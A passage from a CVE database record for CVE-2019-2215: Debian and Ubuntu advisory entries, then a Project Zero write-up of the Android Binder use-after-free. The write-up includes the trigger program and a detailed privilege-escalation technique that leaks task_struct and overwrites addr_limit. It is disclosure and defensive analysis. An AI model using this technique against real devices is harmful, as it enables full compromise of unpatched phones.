"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-11T19:15:00", "type": "debiancve", "title": "CVE-2019-2215", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-11T19:15:00", "id": "DEBIANCVE:CVE-2019-2215", "href": "https://security-tracker.debian.org/tracker/CVE-2019-2215", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-29T14:25:02", "description": "A use-after-free in binder.c allows an elevation of privilege from an\napplication to the Linux Kernel. No user interaction is required to exploit\nthis vulnerability, however exploitation does require either the\ninstallation of a malicious local application or a separate vulnerability\nin a network facing application.Product: AndroidAndroid ID: A-141720095\n\n#### Bugs\n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=1942>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | from the project zero report: enabling CONFIG_DEBUG_LIST breaks the primitive.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-11T00:00:00", "type": "ubuntucve", "title": "CVE-2019-2215", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-11T00:00:00", "id": "UB:CVE-2019-2215", "href": "https://ubuntu.com/security/CVE-2019-2215", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-29T16:10:39", "description": "In binder_thread_release of binder.c, there is a possible use after free\ndue to a race condition. This could lead to local escalation of privilege\nwith no additional execution privileges needed. User interaction is not\nneeded for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\nA-145286050References: Upstream kernel\n\n#### Notes\n\nAuthor| Note \n---|--- \n[cascardo](<https://launchpad.net/~cascardo>) | This seems to be like that since binder was added to the kernel, ie., binder would allow the thread to be freed while its wait member was still in the epoll waitqueue. Description was taken from patch's comment, as it describes the specific race condition that makes this different from CVE-2019-2215. I added the first sentence which would be a fair description of both this CVE and CVE-2019-2215.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-13T00:00:00", "type": "ubuntucve", "title": "CVE-2020-0030", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215", "CVE-2020-0030"], "modified": "2020-02-13T00:00:00", "id": "UB:CVE-2020-0030", "href": "https://ubuntu.com/security/CVE-2020-0030", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2023-06-14T02:00:23", "description": "Posted by Maddie Stone, Project Zero \n\n\n \n\n\nIntroduction\n\nOn October 3, 2019, we disclosed issue [1942](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942>) (CVE-2019-2215), which is a use-after-free in Binder in the Android kernel. The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If chained with a browser renderer exploit, this bug could fully compromise a device through a malicious website.\n\n** \n**\n\nWe reported this bug under a 7-day disclosure deadline rather than the normal 90-day disclosure deadline. We made this decision based on credible evidence that an exploit for this vulnerability exists in the wild and that it's highly likely that the exploit was being actively used against users.\n\n** \n**\n\nIn May 2019, Project Zero published a [blog post](<https://googleprojectzero.blogspot.com/p/0day.html>) and [spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/view#gid=0>) for tracking \u201cin-the-wild\u201d 0-day exploits. In July 2019, I joined Project Zero to focus on the use of 0-day exploits in the wild. We expect our approach to this work will change and mature as we gain more experience with studying 0-days, but the mission stays the same: to \u201cmake zero-day hard\u201d. \n\n** \n**\n\nSo far there are a few key approaches that we have started with: \n\n\n * Hunt for bugs based on rumors/leads that a 0-day is currently in use. We will use our bug hunting expertise to find and patch the bug, rendering the exploit benign.\n\n * Perform variant analysis on 0-days used in the wild. When looking for bugs, you often find more than one of a similar type at the same time. However, an exploit usually uses one instance of a possible pattern or variant. If we can find and resolve all of the similar variant bugs, then the effort involved in creating a new exploit will be higher.\n\n * Complete detailed analysis of the 0-days from the point of view of bug hunters and exploit developers and share it back with the community. Transparency and collaboration are key. We want to share detailed root cause analysis to inform developers and defenders on how to prevent these types of bugs in the future and improve detection. We hope that by publishing details about the exploit and its methodology, this can inform threat intelligence and incident responders. Overall, we want to make information that\u2019s often kept in silos accessible to all. \n\n** \n**\n\nThis is just the starting point of how we\u2019re thinking about tactical work around 0-day exploits used in the wild, but we won\u2019t make much progress if we try to do this alone. Whether you\u2019re a vendor, defender, researcher, journalist, threat analyst, policy specialist, victims\u2019 advocate, or someone else, we all have a role we can play to make it hard to exploit 0-days in the wild. Please feel free to reach out to me to explore how we may be able to work together.\n\n** \n**\n\nThe rest of this post is to drive this conversation forward by sharing one instance of such work: CVE-2019-2215. This blog post will explain the bug and the methodology for finding it, how the proof-of-concept exploit we released works, and the evidence and commentary on the use of this bug for in-the-wild exploitation.\n\n# Hunting the Bug\n\nIn late summer 2019, Google\u2019s Threat Analysis Group (TAG), Android Security, and Project Zero team received information suggesting that NSO had a 0-day exploit for Android that was part of an attack chain that installed Pegasus spyware on target devices. We received details about the marketed \u201ccapability\u201d. These details included facts about the bug and exploit methodology, including: \n\n\n * It is a kernel privilege escalation using a use-after-free vulnerability, reachable from inside the Chrome sandbox.\n\n * It works on Pixel 1 and 2, but not Pixel 3 and 3a. \n\n * It was patched in the Linux kernel >= 4.14 without a CVE. \n\n * CONFIG_DEBUG_LIST breaks the primitive.\n\n * CONFIG_ARM64_UAO hinders exploitation.\n\n * The vulnerability is exploitable in Chrome's renderer processes under Android's isolated_app SELinux domain.\n\n * The exploit requires little or no per-device customization.\n\n * A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of issue [1942](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942>).\n\n** \n**\n\nEach of these facts gave us important information to scope down the potential bug that we were looking for. \n\n\n * \u201cIt is a kernel privilege escalation using a use-after-free vulnerability, accessible from inside the Chrome sandbox.\u201d\n\nWe know that it\u2019s a use-after-free in the kernel.\n\n** \n**\n\n * \"It works on Pixel 1 and 2, but not Pixel 3 and 3a.\"\n\nWe can diff the Pixel 2 and Pixel 3 kernels looking for changes.\n\n** \n**\n\n * \"It was patched in the Linux kernel >= 4.14 without a CVE.\"\n\nThe Pixel 3 is based on the Linux kernel 4.9 and doesn\u2019t include the vulnerability, but the fix is not in the 4.9 Linux kernel, only 4.14.\n\n** \n**\n\n * \"CONFIG_DEBUG_LIST breaks the primitive.\"\n\nThis was an extremely helpful tip. In the kernel, there are only two actions (three functions) whose behavior changes based on the CONFIG_DEBUG_LIST flag: adding (__list_add) and deleting (__list_del_entry and list_del) from a doubly linked list. Therefore, we could infer that the freed obj is a linked list and has an add or delete performed on it after the free occurs.\n\n** \n**\n\n * \"CONFIG_ARM64_UAO hinders exploitation.\"\n\nLikely means that the exploit is using the memory corruption to overwrite the address limit that is stored near the start of the task_struct. (It would normally be stored at the bottom of the stack on Linux <=4.9, but Android backported the change that moved it into task_struct to protect against stack overflows to older kernels.)\n\n** \n**\n\n * The exploit requires little or no per-device customization.\n\nWe can assume the bug and its exploitation methodology are in the common kernel rather than in code that is often customized, like the framework.\n\n** \n**\n\n * \"A list of affected and unaffected devices and their versions.\"\n\nWhenever there was a candidate bug that seemed to fit all the requirements above, I then vetted it against the list of affected and unaffected devices.\n\n** \n**\n\nBased on these details, I began combing through changelogs and patches looking for the potential bug. Finding CVE-2019-2215 actually occured on my second attempt. I had originally thought the potential bug was a different issue, but then ruled it out based on the information above.\n\n** \n**\n\nA few weeks after my first attempt at tracking down this bug, others recommended that I should look at Binder. Looking back, the detail that states \u201cThe vulnerability is exploitable in Chrome's renderer processes under Android's isolated_app SELinux domain.\u201d should have caused me to look at the Binder driver first, but it didn\u2019t.\n\n** \n**\n\nWhen I diffed the Pixel 2 and Pixel 3 drivers/android/binder.c files and their changelogs, there were only a few significant changes. Commit [550c01d0e051461437d6e9d72f573759e7bc5047](<https://android.googlesource.com/kernel/msm/+/550c01d0e051461437d6e9d72f573759e7bc5047>) stood out in the log because: \n\n\n 1. It discusses fixing a \u201cuse-after-free\u201d in the commit message,\n\n 2. It is a patch from upstream, and\n\n 3. The upstream patch was only applied to 4.14.\n\n** \n**\n\nI then began to evaluate this bug against the other requirements of the bug in the leads and found that it matched them perfectly. I also looked through every other change to Binder (~25) between the Pixel 2 and Pixel 3, and no other changes matched every detail.\n\n** \n**\n\nWe wrote a proof-of-concept of our own that demonstrates how this bug can be exploited. \n\n## The Original Discovery of the Bug \n\nThis bug was originally found and reported in November 2017 and patched in February 2018. Syzbot, a [syzkaller](<https://github.com/google/syzkaller>) system that continuously fuzzes the Linux kernel, [originally reported the use-after-free bug](<https://groups.google.com/forum/#!msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ>) to Linux kernel mailing lists and the [syzkaller-bugs](<https://groups.google.com/forum/#!forum/syzkaller-bugs>) mailing list in November 2017. From this report, the bug was patched in the [Linux 4.14](<https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/drivers/android/binder.c?h=linux-4.14.y&id=7a3cee43e935b9d526ad07f20bf005ba7e74d05b>), [Android 3.18](<https://android-review.googlesource.com/c/kernel/common/+/609966>), [Android 4.4](<https://android-review.googlesource.com/c/kernel/common/+/573742>), and [Android 4.9](<https://android-review.googlesource.com/c/kernel/common/+/609868>) kernels in February 2018. However, this fix was never included in an Android monthly security bulletin and thus the bug was never patched in many already released devices, such as Pixel and Pixel 2.\n\n** \n**\n\nAndroid provided the following statement on the original discovery of the bug.\n\n** \n**\n\n\"Android was informed of the security implications of this bug by Project Zero on September 26, 2019. Android partners were notified of the bug and provided updates to address it within 24 hours. Android also assigned[ CVE-2019-2215](<https://nvd.nist.gov/vuln/detail/CVE-2019-2215>) to explicitly indicate that it represents a security vulnerability as the[ original report from syzkaller](<https://groups.google.com/forum/#!msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ>) and the corresponding[ Linux 4.14](<https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/drivers/android/binder.c?h=linux-4.14.y&id=7a3cee43e935b9d526ad07f20bf005ba7e74d05b>) patch did not highlight any security implications. \n\n** \n**\n\nPixel 3 and 3a were already protected against these issues. Updates for affected Pixel devices were available to users as early as[ October 7th, 2019](<https://source.android.com/security/bulletin/2019-10-01>).\u201d\n\n# Technical Details of the Bug\n\nThe [bug](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942>) is a use-after-free (UAF) in the Binder driver. The binder_thread struct, defined in drivers/android/binder.c, has the member wait of the wait_queue_head_t struct type. wait is still referenced by a pointer in epoll, even after the binder_thread struct containing it is freed.\n\n** \n**\n\nstruct binder_thread {\n\nstruct binder_proc *proc;\n\nstruct rb_node rb_node;\n\nstruct list_head waiting_thread_node;\n\nint pid;\n\nint looper; /* only modified by this thread */\n\nbool looper_need_return; /* can be written by other thread */\n\nstruct binder_transaction *transaction_stack;\n\nstruct list_head todo;\n\nbool process_todo;\n\nstruct binder_error return_error;\n\nstruct binder_error reply_error;\n\nwait_queue_head_t wait;\n\nstruct binder_stats stats;\n\natomic_t tmp_ref;\n\nbool is_dead;\n\nstruct task_struct *task;\n\n}; \n \n--- \n \n** \n**\n\nstruct __wait_queue_head {\n\nspinlock_t lock;\n\nstruct list_head task_list;\n\n};\n\ntypedef struct __wait_queue_head wait_queue_head_t; \n \n--- \n \n** \n**\n\nThe BINDER_THREAD_EXIT ioctl calls the binder_thread_release function which frees the binder_thread struct. However, if epoll is called on this thread, binder_poll tells epoll to use wait, the wait queue that is embedded in the binder_thread struct. Therefore, when the binder_thread struct is freed, epoll is pointing to the now freed wait queue. Normally, the wait queue used for polling on a file is guaranteed to be alive until the file\u2019s release handler is called. Rare cases require the use of POLLFREE. In contrast, the Binder driver only worked if you constantly removed and re-added the epoll watch. This is the underlying bug and the use-after-free is a symptom of that.\n\n** \n**\n\nWhen we look at the stack trace from [KASAN](<https://www.kernel.org/doc/html/v4.14/dev-tools/kasan.html>) in the [original report](<https://groups.google.com/forum/#!msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ>), we can see the use-after-free is in remove_wait_queue in kernel/sched/wait.c. The source code for the remove_wait_queue is below. In the remove_wait_queue function, q is the pointer to the freed wait_queue_head_t in the binder_thread struct and wait is an entry in the wait queue whose head has been freed. The use-after-free that triggered the KASAN crash is the call to spin_lock_irqsave with argument &q->lock when q is pointing to freed memory.\n\n** \n**\n\nHowever, the __remove_wait_queue call is more interesting for exploitation. As shown below, __remove_wait_queue simply calls list_del on the task_list in the wait queue, giving us an unlinking primitive.\n\n** \n**\n\nvoid remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)\n\n{\n\nunsigned long flags;\n\nspin_lock_irqsave(&q->lock, flags);\n\n__remove_wait_queue(q, wait);\n\nspin_unlock_irqrestore(&q->lock, flags);\n\n} \n \n--- \n \n** \n**\n\n__remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)\n\n{\n\nlist_del(&old->task_list);\n\n} \n \n--- \n \n** \n**\n\nThe bug can be triggered with the following code, which was also in the original report from syzkaller.\n\n \n\n\n#include <fcntl.h>\n\n#include <sys/epoll.h>\n\n#include <sys/ioctl.h>\n\n#include <unistd.h>\n\n \n\n\n#define BINDER_THREAD_EXIT 0x40046208ul\n\n \n\n\nint main()\n\n{\n\nint fd, epfd;\n\nstruct epoll_event event = { .events = EPOLLIN };\n\nfd = open(\"/dev/binder\", O_RDONLY);\n\nepfd = epoll_create(1000);\n\nepoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);\n\nioctl(fd, BINDER_THREAD_EXIT, NULL);\n\n} \n \n--- \n \n** \n**\n\nI verified that the Pixel 2, running Android 10 with SPL September 2019, still included this bug. The KASAN output is included in the [issue tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942#c3>).\n\n# Exploiting the Use-After-Free\n\nAfter confirming the bug and reporting to Android, I began working with fellow team member, Jann Horn, to write a proof-of-concept (PoC) exploit. The PoC we published on the issue tracker in [comment #7](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942#c7>) used the UAF described above to gain arbitrary kernel read and write from an unprivileged application context. In this section, I will explain how the PoC exploit that we wrote works. This section describes how we decided to exploit this bug and not necessarily how the in-the-wild exploit works.\n\n** \n**\n\nThis exploit triggers the UAF twice in order to overwrite the address limit to obtain arbitrary kernel read and write privileges. The first use of the UAF leaks the address of the task_struct, which contains the process\u2019s address limit (addr_limit). The second use of the UAF overwrites the value of addr_limit. The addr_limit value defines which address range may be accessed when dereferencing userspace pointers. Usercopy operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process.\n\n** \n**\n\nTo trigger the UAF, we use [vectored (scatter/gather) I/O](<http://man7.org/linux/man-pages/man2/readv.2.html#DESCRIPTION>) in a somewhat similar way to what DiShen presented in his talk from Code Blue 2017, \u201cThe Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel\u201d [[video](<https://www.youtube.com/watch?v=U2qvK1hJ6zg>)].\n\n## Triggering the UAF\n\nTo exploit the UAF bug, we reallocate the freed binder_thread memory as an I/O vector and then use the unlinking primitive to gain scoped kernel read to leak the task_struct address. We trigger the UAF again for scoped kernel write to then overwrite the addr_limit. This section describes how we use the UAF for the initial read and write.\n\n### About Vectored I/O\n\nVectored I/O is also known as scatter/gather I/O. Vectored reads move data from a data source (here a file) into a set of disparate buffers (scatter), moving onto the next after each buffer is filled. A vectored write moves data from a set of buffers into a data sink (here a file) (gather). readv and writev are syscalls for performing vectored I/O. Their definitions from fs/read_write.c are below. \n\n** \n**\n\nSYSCALL_DEFINE3(readv, unsigned long, fd, const struct iovec __user *, vec,\n\nunsigned long, vlen)\n\n \n\n\nSYSCALL_DEFINE3(writev, unsigned long, fd, const struct iovec __user *, vec,\n\nunsigned long, vlen) \n \n--- \n \n** \n**\n\nThe vec arguments are arrays of iovec structs where each iovec struct describes a buffer. The iovec struct definition from include/uapi/linux/uio.h is below.\n\n** \n**\n\nstruct iovec\n\n{\n\nvoid __user *iov_base;\n\n__kernel_size_t iov_len;\n\n}; \n \n--- \n \n** \n**\n\nWe use writev to leak the address of the task_struct the first time we trigger the UAF. In addition to readv and writev, the recvmsg syscall for receiving a message from a socket also uses vectored I/O. In the msghdr, the second argument to recvmsg, there is a member named msg_iov that points to an array of iovec structs. We use recvmsg the second time we trigger the UAF to overwrite the addr_limit. \n\n### Using vectored I/O for UAF write and read\n\nWe use the vectored I/O to gain UAF read (leaking the task_struct address) and UAF write (overwriting the addr_limit in the task_struct). Vectored I/O operations (like readv, writev, and recvmsg) import the user-space I/O vector array into kernel space and verify that all of the vector elements are in userspace in the call to rw_copy_check_uvector. If rw_copy_check_uvector returns successfully, the iovec array is now in kernel space and there will not be another verification on the pointer values in the iov_base fields. This means that while the I/O is blocking, we can overwrite the buffer pointers in the iovec array using our UAF read/write and then read from or write to a place in kernel memory. \n\n** \n**\n\nThe iovec struct is of size 16 bytes and the binder_thread struct is 408 bytes. Therefore, we will create an array of 25 iovec structs in order to make the iovec array a similar size to the freed struct. The kernel allocates memory based on the size of the allocations so if we can control a struct of almost the same size as the freed memory, then there is a good chance that our controlled struct will be allocated into the same place. The iovec array is 8 bytes smaller than the binder_thread in order to not overwrite the task_struct pointer value at the end of the binder_thread struct, but that is still close enough to be allocated into the same slab, and thus the same position in kernel memory as the freed binder_thread struct. \n\n** \n**\n\nWhen the iovec array is allocated into the same memory as our freed binder_thread struct, the struct members will line up as below.\n\n** \n**\n\nbinder_thread struct\n\n| \n| \n\niovec array \n \n---|---|--- \n \n0x00\n\n| \n| \n\n0x00: iovec[0].iov_base \n \n...\n\n| \n| \n\n0x08: iovec[0].iov_len \n \n...\n\n| \n| \n\n... \n \n0xA0: wait.lock\n\n| \n| \n\n0xA0: iovec[10].iov_base \n \n0xA8: wait.task_list.next\n\n| \n| \n\n0xA8: iovec[10].iov_len \n \n0xB0: wait.task_list.prev\n\n| \n| \n\n0xB0: iovec[11].iov_base \n \n...\n\n| \n| \n\n... \n \n** \n**\n\nOnce the vectored I/O has copied our iovec structs into kernel memory, we then want the I/O operation to block so that ep_remove_wait_queue can run from a separate thread. When ep_remove_wait_queue runs, it will perform a list_del operation on the values at offsets 0xA8 and 0xB0 in our diagram since ep_remove_wait_queue still believes these memory values to be a part of the wait_queue_head_t struct. \n\n** \n**\n\nep_remove_wait_queue calls remove_wait_queue that calls __remove_wait_queue that calls list_del. \n\n** \n**\n\nstatic inline void __list_del(struct list_head * prev, struct list_head * next)\n\n{\n\nnext->prev = prev;\n\nWRITE_ONCE(prev->next, next);\n\n}\n\n \n\n\n#ifndef CONFIG_DEBUG_LIST\n\n...\n\nstatic inline void list_del(struct list_head *entry)\n\n{\n\n__list_del(entry->prev, entry->next);\n\nentry->next = LIST_POISON1;\n\nentry->prev = LIST_POISON2;\n\n} \n \n--- \n \n** \n**\n\nThe UAF exploitation technique described in this blog post is not successful when CONFIG_DEBUG_LIST is enabled because list_del is implemented differently when it\u2019s enabled. The implementation when CONFIG_DEBUG_LIST is NOT enabled is shown above.\n\n** \n**\n\nThe debug implementation, shown below, is found in lib/list_debug.c. In the debug version, list_del calls __list_del_entry which includes checks to ensure that prev->next == entry && next->prev == entry. If any of these checks fail, BUG_ON will be called and the process will die (and on Android devices, which usually set kernel.panic_on_oops=1, the entire device will reboot). This check is what prevents this exploitation method from working when CONFIG_DEBUG_LIST is enabled.\n\n** \n**\n\nvoid __list_del_entry(struct list_head *entry)\n\n{\n\nstruct list_head *prev, *next;\n\n \n\n\nprev = entry->prev;\n\nnext = entry->next;\n\n \n\n\nif (WARN(next == LIST_POISON1,\n\n\"list_del corruption, %p->next is LIST_POISON1 (%p)\\n\",\n\nentry, LIST_POISON1) ||\n\nWARN(prev == LIST_POISON2,\n\n\"list_del corruption, %p->prev is LIST_POISON2 (%p)\\n\",\n\nentry, LIST_POISON2) ||\n\nWARN(prev->next != entry,\n\n\"list_del corruption. prev->next should be %p, \"\n\n\"but was %p\\n\", entry, prev->next) ||\n\nWARN(next->prev != entry,\n\n\"list_del corruption. next->prev should be %p, \"\n\n\"but was %p\\n\", entry, next->prev)) {\n\nBUG_ON(PANIC_CORRUPTION);\n\nreturn;\n\n}\n\n \n\n\n__list_del(prev, next);\n\n}\n\nEXPORT_SYMBOL(__list_del_entry);\n\n \n\n\n/**\n\n* list_del - deletes entry from list.\n\n* @entry: the element to delete from the list.\n\n* Note: list_empty on entry does not return true after this, the entry is\n\n* in an undefined state.\n\n*/\n\nvoid list_del(struct list_head *entry)\n\n{\n\n__list_del_entry(entry);\n\nentry->next = LIST_POISON1;\n\nentry->prev = LIST_POISON2;\n\n} \n \n--- \n \n** \n**\n\nThe entry being passed to list_del is an entry in the wait queue list. The freed wait_queue_head_t struct contains the list head of which this entry is the only member. Prior to the list_del operation, the list looks like in the diagram below. \n \n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGU1dBFfY7s_Pu9nwOv8dDWsWrRZXehSEeTMHKqLmM9oTPbUgxVz3bDuFr84_qm57ElHIAHPAYqiwE56PdTOgyCGeq1j_jN9ki7A2rNRYOTQzfaydlfEyGvNyi6_ejYwMUudh6PQmm3N0MoBaIZi6nq15Cx2YLBdYxET0-zA75OsVNpIY5RgI-93q3/s1200/CVE-2019-2215%20UAF-before%20list_del%20%281%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGU1dBFfY7s_Pu9nwOv8dDWsWrRZXehSEeTMHKqLmM9oTPbUgxVz3bDuFr84_qm57ElHIAHPAYqiwE56PdTOgyCGeq1j_jN9ki7A2rNRYOTQzfaydlfEyGvNyi6_ejYwMUudh6PQmm3N0MoBaIZi6nq15Cx2YLBdYxET0-zA75OsVNpIY5RgI-93q3/s2048/CVE-2019-2215%20UAF-before%20list_del%20%281%29.png>)\n\n \n\n\n** \n**\n\nAfter the list_del the operation looks like the diagram below. The list head prev and next pointers have been set to point to the list head. This means that iov_base has been overwritten with a kernel address and we can now perform scoped read and write operations from the kernel space beginning at the list head. \n \n\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyf3Ul-Tsn9a9-kf5Lte8cFyFIPynT6zy8WLmSVX4pg63jorXThsHNO_DJzirtHpiKrtsSV3pMnv5UYsVn1ROrQRaMX740FU_JMQnBBSBjyM9bF5tTkTSemAe9g1L47ThrGVICZ_bFWTxxvE_Tsf72T7RwuU1uUSphcS_lfPnza65a_HYlB9mHKAUe/s1200/CVE-2019-2215%20UAF-post%20list_del%20%281%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyf3Ul-Tsn9a9-kf5Lte8cFyFIPynT6zy8WLmSVX4pg63jorXThsHNO_DJzirtHpiKrtsSV3pMnv5UYsVn1ROrQRaMX740FU_JMQnBBSBjyM9bF5tTkTSemAe9g1L47ThrGVICZ_bFWTxxvE_Tsf72T7RwuU1uUSphcS_lfPnza65a_HYlB9mHKAUe/s2048/CVE-2019-2215%20UAF-post%20list_del%20%281%29.png>)\n\n### Leaking the task_struct pointer\n\nWe follow the process outlined above to use the use-after-free to leak the task structure pointer. In the Linux kernel, and thus in the Android kernel, the task_struct includes most of the important information about a process. In this case, we want to get the pointer to the task_struct because it includes the process\u2019s address limit. \n\n** \n**\n\nThe code to leak the task_struct pointer is in the function leak_task_struct in the PoC. The function starts by adding the binder file descriptor (fd) to the epoll\u2019s interest list. We then create an array of 25 iovec structs. Next, we set the values of each of the iovec entries. For the first 10 entries, we set both the iov_base and iov_len to 0 so that the kernel skips them when processing the vector. iovec[10].iov_base is set to a value that will look like an unlocked spinlock. iovec[10].iov_len is set to the same size as the pipe such that when the pipe will block after moving all the contents from iovec[10].iov_base into the pipe. Once it unblocks, it will begin on iovec[11].\n\n** \n**\n\nbinder_thread struct\n\n| \n| \n\niovec array \n \n---|---|--- \n \n0x00\n\n| \n| \n\n0x00: iovec[0].iov_base\n\n0x00000000 00000000 \n \n...\n\n| \n| \n\n0x08: iovec[0].iov_len\n\n0x00000000 00000000 \n \n...\n\n| \n| \n\n... \n \n0xA0: wait.lock\n\n| \n| \n\n0xA0: iovec[10].iov_base\n\ndummy_page_4g_aligned \n \n0xA8: wait.task_list.next\n\n| \n| \n\n0xA8: iovec[10].iov_len\n\n0x1000 \n \n0xB0: wait.task_list.prev\n\n| \n| \n\n0xB0: iovec[11].iov_base\n\n0xDEADBEEF \n \n...\n\n| \n| \n\n0xB8: iovec[11].iov_len\n\n0x1000 \n \n...\n\n| \n| \n\n... \n \n** \n**\n\nWe set iovec[10].iov_base to dummy_page_4g_aligned because we need the lower-half of the address value to be 0 for it to pass as a spinlock. In remove_wait_queue, we need spin_lock_irqsave to run successfully so that __remove_wait_queue is called.\n\n** \n**\n\nFor this to be successful, the call to remove_wait_queue from within the EPOLL_CTL_DEL execution must occur after the iovec array has been copied to kernel memory by rw_copy_check_uvector (called by writev) and iovec[10] has been processed (since its length will be clobbered by the UAF write), but before writev begins reading from the address at iovec[11].iov_base. \n\n** \n**\n\nTherefore, we need the writev call to block prior to trying to write the iovec[11] contents to the pipe. To do this, we fill the whole pipe with contents that we don\u2019t care about. Because we completely fill the pipe, writev will block until something begins to read from the pipe. Therefore, we set iovec[10].iov_base to be the address of the buffer with these filler contents and we set its length to the same size as the pipe size. writev will put all of the dummy contents into the pipe and block, giving us time to change the address of iovec[11].iov_base with the unlinking primitive in remove_wait_queue. After remove_wait_queue finishes, we can read the dummy contents from the pipe, unblocking the write. The now-unblocked writev will begin reading from the address in iovec[11].iov_base, which has now been changed to the list head address, binder_thread + 0xa8, in the kernel. \n \n\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOLHIg0b3WfN8xq12XlAsCCrSPWQDP-BBe86dPn8-CP-wn6SKv4yrUsettr8hK3Oodx14eGBUKmDJm6hfz1y-C0MQolutAhH6ZjyxKaFKnHxDMZiFdHEwXJc1l3pAW34BEQbb1kMcgwoiiACHMaxIkPOboYIA5kfdC_sDPFBEzHd7JRxykfR5XK5Z2/s1200/CVE-2019-2215%20UAF-Flow%20graph%20for%20blog.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOLHIg0b3WfN8xq12XlAsCCrSPWQDP-BBe86dPn8-CP-wn6SKv4yrUsettr8hK3Oodx14eGBUKmDJm6hfz1y-C0MQolutAhH6ZjyxKaFKnHxDMZiFdHEwXJc1l3pAW34BEQbb1kMcgwoiiACHMaxIkPOboYIA5kfdC_sDPFBEzHd7JRxykfR5XK5Z2/s2048/CVE-2019-2215%20UAF-Flow%20graph%20for%20blog.png>)\n\nOnce the writev finishes, we read from the other end of the pipe. The value at offset 0xE8 is the task_struct pointer. (The wait queue list head is at 0xa8 in the binder_thread struct and the task_struct pointer is at 0x190.)\n\n** \n**\n\n### Overwriting the Address Limit\n\nNow that we have saved off the task_struct pointer, we trigger the UAF again in order to overwrite the address limit (at task_struct + 0x08), this time using recvmsg instead of writev. The process through the list_del is the same: the iov_base ends up pointing to the list_head of the wait_queue. At this point, though, instead of reading from that address, we begin to write the values below. \n\n** \n**\n\nunsigned long second_write_chunk[] = 